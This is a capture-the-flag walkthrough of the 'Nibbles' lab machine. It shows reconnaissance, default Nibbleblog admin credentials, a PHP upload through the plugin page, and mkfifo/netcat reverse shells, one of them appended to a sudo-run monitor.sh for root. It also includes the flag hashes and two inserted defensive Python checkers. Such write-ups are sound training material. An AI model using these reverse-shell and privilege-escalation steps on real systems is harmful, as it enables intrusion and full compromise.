# User Flag
![[nibbles_card.webp]]
## Recon:
### Nmap
The first scan we always perform is an [[Nmap|Nmap]] scan. It shows us which services are running and can even reveal vulnerable service versions on our target. In this case we're going to run `nmap` with the following flags:
- `-sV` for [[Nmap#Service Detection|Service Detection]]
- `-sC` for basic [[Nmap#Script Scanning|Script Scanning]]
```shell
# Nmap 7.94SVN scan initiated Mon Oct 21 18:12:48 2024 as: /usr/lib/nmap/nmap --privileged -sV -sC -oN nmap/nmap-apache 10.129.119.36
Nmap scan report for 10.129.119.36
Host is up (0.049s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Oct 21 18:12:57 2024 -- 1 IP address (1 host up) scanned in 9.16 seconds
```
#### Services to Investigate:
- Port `80 HTTP`
### whatweb
Knowing that this box is running a webserver, we should begin by identifying the webserver's `OS`, type and version using [[whatweb]]:
```shell
┌──(parallels㉿kali-gnu-linux-2023)-[~/Documents/Getting-Started/12.Nibbles]
└─$ whatweb 10.129.8.89
http://10.129.8.89 [200 OK] Apache[2.4.18], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.129.8.89]
```
### curl
The next thing we can do is `curl` the contents of the home page. Of course we can also visit the site in our web browser if we like:
```shell
┌──(parallels㉿kali-gnu-linux-2023)-[~/Documents/Getting-Started/12.Nibbles]
└─$ curl 10.129.8.89
<b>Hello world!</b>
<!-- /nibbleblog/ directory. Nothing interesting here! -->
```
The `nibbleblog` directory may be interesting, let's use `gobuster` on that directory and see what we get.
### gobuster
[[gobuster|gobuster]] allows us to explore directories in the webserver, which correlate to file paths we can investigate in the browser. Running `gobuster` is a guessing game, because our results rely completely on the `wordlist` chosen.
```shell
┌──(parallels㉿kali-gnu-linux-2023)-[~/Documents/Getting-Started/12.Nibbles]
└─$ gobuster dir -u http://10.129.8.89/nibbleblog --wordlist /usr/share/seclists/Discovery/Web-Content/common.txt -o gobusterSecListNibbleBlog
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.129.8.89/nibbleblog
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd (Status: 403) [Size: 306]
/.hta (Status: 403) [Size: 301]
/.htaccess (Status: 403) [Size: 306]
/README (Status: 200) [Size: 4628]
/admin (Status: 301) [Size: 321] [--> http://10.129.8.89/nibbleblog/admin/]
/admin.php (Status: 200) [Size: 1401]
/content (Status: 301) [Size: 323] [--> http://10.129.8.89/nibbleblog/content/]
/index.php (Status: 200) [Size: 2987]
/languages (Status: 301) [Size: 325] [--> http://10.129.8.89/nibbleblog/languages/]
/plugins (Status: 301) [Size: 323] [--> http://10.129.8.89/nibbleblog/plugins/]
/themes (Status: 301) [Size: 322] [--> http://10.129.8.89/nibbleblog/themes/]
```
#### Directories to Investigate:
- `/admin.php`, likely an admin login page
- `/README` may have some useful info, or forgotten credentials
- `/admin` requires login permissions, but it does exist and we could take advantage of it
### Visit README file
Visit `http://nibbles.com/nibbleblog/README` to retrieve some info on the site:
```shell
====== Nibbleblog ======
Version: v4.0.3
Codename: Coffee
Release date: 2014-04-01
Site: http://www.nibbleblog.com
Blog: http://blog.nibbleblog.com
Help & Support: http://forum.nibbleblog.com
Documentation: http://docs.nibbleblog.com
===== Social =====
* Twitter: http://twitter.com/nibbleblog
* Facebook: http://www.facebook.com/nibbleblog
* Google+: http://google.com/+nibbleblog
===== System Requirements =====
* PHP v5.2 or higher
* PHP module - DOM
* PHP module - SimpleXML
* PHP module - GD
* Directory "content" writable by Apache/PHP
Optionals requirements
* PHP module - Mcrypt
===== Installation guide =====
1- Download the last version from http://nibbleblog.com
2- Unzip the downloaded file
3- Upload all files to your hosting or local server via FTP, Shell, Cpanel, others.
4- With your browser, go to the URL of your web. Example: www.domain-name.com
5- Complete the form
6- Done! you have installed Nibbleblog
===== About the author =====
Name: Diego Najar
E-mail: [email protected]
Linkedin: http://www.linkedin.com/in/dignajar
```
As a result of investigating this file, we see that the site is running Nibbleblog version `4.0.3`, which may be vulnerable. However, we still need to gather some information on the target. To do that, we can visit some of the paths listed by our [[Nibbles#gobuster|gobuster enumeration]].
### Visit /nibbleblog/content
When checking `/nibbleblog/content` we find a few directories:
- `Private`
- `Public`
- `Tmp`
The private directory is browsable and contains a lot of `xml` files. One of them is `users.xml`; looking into it shows us that the administrator's username is `admin`. The same file also lists a blacklisted IP address, `10.10.10.1`.
## Credentials:
| Username | Password |
| -------- | -------- |
| admin | nibbles |
| nibbler | |
## Initial Foothold:
Now that we have a username and password for the admin user of `nibbleblog`, we can log in and begin poking around.
![[nibbleblog admin page.png]]
There are a few different pages to look into, but the most interesting appears to be the `Plugins` page.
![[nibbleblog plugin page.png]]
It appears that we can upload our own plugins via the `Plugins Available for Install` section.
![[nibbleblog plugins available for install.png]]
Next, we can test if `php` code can be uploaded:
```php
<?php system('id'); ?>
```
We got some errors when we ran that, but let's check out the directories again to see if that file went somewhere. We're going to visit `/nibbleblog/content/private/plugins/about`.
![[nibbleblog php test.png|500]]
It looks like the **Last Modified** section shows that these files were edited just now, which implies that they changed as a result of us uploading that file.
Checking `profile_picture.php` shows us the following:
```shell
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)
```
This is the output of the `php` test script we uploaded earlier. It prints the result of `id`, which tells us not only that we can execute code but also which user and groups the webserver runs as. In particular, the username is `nibbler`.
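Both findings so far, a browsable `content/private` tree that exposes `users.xml` and a `.php` file executing from `content/private/plugins/`, leave a clear trace in the Apache access log. As an added defender's-side example (not part of the original walkthrough and not Nibbleblog code), the minimal combined-log parser below flags both; the sample log lines are constructed to mirror the requests made above:

```python
import re

# Minimal combined-log-format parser (constructed for this example; not Nibbleblog code).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Everything under content/private is Nibbleblog data (users.xml, plugin config). A browser
# should never fetch it, and a .php file served from there means an upload became a web shell.
PRIVATE_PREFIX = "/nibbleblog/content/private/"

def classify(line: str):
    """Return (severity, reason, path) for a suspicious request, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = m.group("path").split("?", 1)[0]
    if not path.startswith(PRIVATE_PREFIX) or int(m.group("status")) >= 400:
        return None  # only successful reads of the private tree matter
    if path.lower().endswith((".php", ".phtml", ".phar")):
        return ("high", "PHP executed from content/private (web shell)", path)
    return ("medium", "direct read of private content", path)

def scan(lines):
    """Run classify over an iterable of log lines and keep the hits, in order."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample lines modelled on the walkthrough above; not real captured traffic.
SAMPLE_LOG = """\
10.10.15.64 - - [21/Oct/2024:18:20:01 +0000] "GET /nibbleblog/ HTTP/1.1" 200 2987
10.10.15.64 - - [21/Oct/2024:18:21:13 +0000] "GET /nibbleblog/content/private/users.xml HTTP/1.1" 200 512
10.10.15.64 - - [21/Oct/2024:18:25:40 +0000] "POST /nibbleblog/admin.php HTTP/1.1" 200 1401
10.10.15.64 - - [21/Oct/2024:18:26:02 +0000] "GET /nibbleblog/content/private/plugins/about/profile_picture.php HTTP/1.1" 200 58
10.10.15.64 - - [21/Oct/2024:18:26:30 +0000] "GET /nibbleblog/content/private/plugins/about/db.xml HTTP/1.1" 404 301
""".splitlines()

if __name__ == "__main__":
    for severity, reason, path in scan(SAMPLE_LOG):
        print(f"[{severity}] {reason}: {path}")
```

The lasting fix is to deny web access to `content/private` entirely and to disable PHP execution under `content/`; the log check above catches attempts that slip past that.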
### Reverse Shell
Next, we can upload a `php` script that will serve as a `reverse shell` for us. We're going to start with a `Bash` one-liner and wrap it inside our `php` script.
![[Reverse Shells#Bash]]
#### PHP
```php
<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKING IP LISTEN PORT >/tmp/f"); ?>
```
Next, we create a file just like before and upload our payload to the `plugin` page. At the same time, we start a `netcat` listener on our attacking machine.
#### Netcat
```shell
nc -lvnp 9443
```
We know we have a successful connection when we see the following:
```shell
┌──(parallels㉿kali-gnu-linux-2023)-[~/Documents/Getting-Started/12.Nibbles]
└─$ nc -lvnp 9443
listening on [any] 9443 ...
connect to [10.10.15.64] from (UNKNOWN) [10.129.238.242] 46266
/bin/sh: 0: can't access tty; job control turned off
$
```
We can improve the quality of our shell on `nibbles` by running the following command:
![[Reverse Shells#Python 3]]
Now that we have a stable shell, we can begin exploring the filesystem. We are immediately placed in the following directory:
```shell
nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/about$ whoami
```
Since this is under `/var/www/html`, we know it is the webserver's document root, which makes sense since that was our entry point. From here it is easy to navigate to the filesystem root and then into the home directory of `nibbler`, where we find the `user.txt` flag.
## Flag:
`79c03865431abf47b90ef24b9695e148`
# Root Flag
## Investigate personal.zip:
In the `nibbler` home directory, there is a zip file named `personal.zip`. We can unzip this and see what's inside using `unzip`:
```shell
nibbler@Nibbles:/home/nibbler$ unzip personal.zip
unzip personal.zip
Archive: personal.zip
creating: personal/
creating: personal/stuff/
inflating: personal/stuff/monitor.sh
```
When we run `cat monitor.sh` we see the following:
```shell
############################################################################
# Tecmint_monitor.sh
# Written for Tecmint.com for the post www.tecmint.com/linux-server-health-monitoring-script/
# If any bug, report us in the link below
# Free to use/edit/distribute the code below by
# giving proper credit to Tecmint.com and Author
#
############################################################################
```
The header identifies this as a copy of Tecmint's Linux server health monitoring script, so it appears to be the monitoring program used for this webserver.
### Look for privilege escalation vectors:
Running `sudo -l` shows that `monitor.sh` can be run as the root user without a password. Since the script lives in our own home directory and we can modify it, anything we add to it will run with root privileges.
```shell
nibbler@Nibbles:/home/nibbler/personal/stuff$ sudo -l
Matching Defaults entries for nibbler on Nibbles:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nibbler may run the following commands on Nibbles:
(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
```
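The root cause here is a `sudo` rule that grants `NOPASSWD` root to a script the invoking user can change. As an added example from the defender's side (my own construction, not from the walkthrough or the Nibbles machine), the audit below parses `sudo -l` output like the block above and reports every rule whose target the user owns, can write to, or can replace via its parent directory or a symlink:

```python
import os
import re
import stat

# Matches rule lines such as "(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh"
SUDO_RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s+(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$")

def parse_sudo_l(output: str):
    """Extract (runas_user, nopasswd, command_path) tuples from `sudo -l` text."""
    rules = []
    for line in output.splitlines():
        m = SUDO_RULE_RE.match(line)
        if not m:
            continue
        runas = m.group("runas").split(":")[0].strip()   # "(root)" or "(ALL : ALL)"
        nopasswd = "NOPASSWD" in m.group("tags")
        for cmd in m.group("cmds").split(","):
            path = cmd.strip().split(" ")[0]             # drop any argument list
            if path.startswith("/"):
                rules.append((runas, nopasswd, path))
    return rules

def modifiable_by(path: str, uid: int, gids) -> bool:
    """True if a user with this uid/groups could change what sudo ends up executing."""
    try:
        st = os.lstat(path)
    except FileNotFoundError:
        return True   # rule points at nothing yet: whoever can create the file controls it
    if stat.S_ISLNK(st.st_mode):
        return True   # a symlink can be re-pointed at any script
    parent = os.stat(os.path.dirname(path) or "/")
    if uid != 0 and uid in (st.st_uid, parent.st_uid):
        return True   # owner of the file, or of its directory, can replace it (the Nibbles case)
    if st.st_mode & stat.S_IWOTH:
        return True   # world-writable
    return bool(st.st_mode & stat.S_IWGRP) and st.st_gid in gids

def audit(output: str, uid: int, gids):
    """Return (runas, path) for rules that run a user-modifiable file as root."""
    gids = set(gids)
    return [(runas, path) for runas, _, path in parse_sudo_l(output)
            if runas in ("root", "ALL") and modifiable_by(path, uid, gids)]

# The `sudo -l` rule from the walkthrough, embedded so the parser can be exercised offline.
NIBBLES_SUDO_L = """\
User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
"""
```

On a live host, call `audit(sudo_l_text, os.getuid(), os.getgroups())` with the captured `sudo -l` output; any result means the rule should point at a root-owned, non-writable copy outside the user's home (or be removed).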
### Craft a Reverse Shell:
To take advantage of this vulnerability, we're going to append a reverse shell to the end of `monitor.sh` so that our reverse shell runs with root privileges.
>[!tip] Notice that we are using a different port number than our current reverse shell. This is necessary to prevent loss of connection.
```shell
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.64 8443 >/tmp/f' | tee -a monitor.sh
```
Before we start this program, we should start another [[Reverse Shells#Netcat Listener|reverse shell listener]] in a terminal tab:
```shell
nc -lnvp 8443
```
Back in our user reverse shell tab, we can run the updated `monitor.sh` program using root permission like so:
```shell
sudo ./monitor.sh
```
We should see a shell open up:
```shell
┌──(parallels㉿kali-gnu-linux-2023)-[~]
└─$ nc -lvnp 8443
listening on [any] 8443 ...
connect to [10.10.15.64] from (UNKNOWN) [10.129.199.145] 43652
#
```
As usual, we want to stabilize the shell:
![[Reverse Shells#Python 3]]
From here we simply navigate to the root directory to find our flag `root.txt`.
## Root Flag:
`de5e5d6619862a8aa5b9b212314e0cdd`